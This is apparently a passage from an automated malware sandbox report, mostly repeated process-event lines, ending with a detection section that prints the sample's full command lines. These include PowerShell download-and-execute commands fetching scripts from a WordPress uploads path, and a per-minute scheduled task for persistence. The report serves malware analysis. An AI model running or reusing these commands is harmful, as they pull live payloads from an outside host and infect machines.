      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3806Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5972Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3906Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5867Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3385
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6404
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3423
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4007
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6632Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616Thread sleep time: -16602069666338586s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 768Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040Thread sleep time: -11068046444225724s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5080Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000005.00000002.2226302807.0000015BEE229000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll ||R`
      Source: wscript.exe, 0000000B.00000003.2648989781.0000027F6D574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Y
      Source: powershell.exe, 00000000.00000002.2111274276.0000017A3B51E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: wscript.exe, 00000004.00000003.2105845382.000002F284695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: wscript.exe, 00000004.00000003.2105845382.000002F284695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}26
      Source: powershell.exe, 0000000C.00000002.2815533149.0000022746DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 00000011.00000002.3405289112.00000191B05C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllcc
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_4508.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /fJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.jsJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js "
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -comman [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $nco7enpofw2ruhm1 = new-object net.webclient; $cio = $nco7enpofw2ruhm1.downloaddata('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php'); $nco7enpofw2ruhm1.downloadfile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php', '7jb5kyotpe8iwe.js'); schtasks /create /sc minute /mo 1 /f /tr ([system.text.encoding]::utf8.getstring($cio) + $env:tmp + '\' + ('7jb5kyotpe8iwe.js ' * 2)) /tn 48dypkzw1;
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "
